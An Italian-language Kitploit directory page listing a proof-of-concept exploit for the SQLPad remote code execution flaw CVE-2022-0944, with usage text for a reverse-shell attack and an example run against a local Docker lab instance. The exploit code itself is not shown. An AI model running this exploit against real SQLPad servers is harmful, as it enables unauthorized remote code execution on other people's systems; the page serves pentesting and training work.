Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-0944 — Un exploit proof of concept per SQLPad RCE (CVE-2022-0944). | Kitploit
Strumenti/GitHubGitHub/shhrew/cve-2022-0944
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubshhrew/cve-2022-0944

CVE-2022-0944

Un exploit proof of concept per SQLPad RCE (CVE-2022-0944).

Vedi Repository
711 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-0944

Un exploit proof of concept per SQLPad RCE (CVE-2022-0944)

Utilizzo

root@kitploit:~
usage: main.py [-h] url lhost lport [username] [password]

positional arguments:
  url         URL to SQLPad
  lhost       Listener host address for reverse shell
  lport       Listener port for reverse shell
  username    login username (optional)
  password    login password (optional)

options:
  -h, --help  show this help message and exit

Esempio:

root@kitploit:~
# install requirements
pip install -r requirements.txt

# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0

# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin

Dichiarazione di non responsabilità

Questo repository contiene codice e strumenti destinati esclusivamente a scopi educativi, in particolare per l'uso in corsi di cybersecurity e ambienti di apprendimento. L'autore di questo codice non si assume alcuna responsabilità per eventuali conseguenze derivanti dall'uso, dall'uso improprio o dalla modifica di questo codice. Il codice è fornito "così com'è" senza alcuna garanzia, esplicita o implicita, incluse, a titolo esemplificativo, le garanzie implicite di commerciabilità o idoneità a uno scopo particolare.

Scarica lo strumento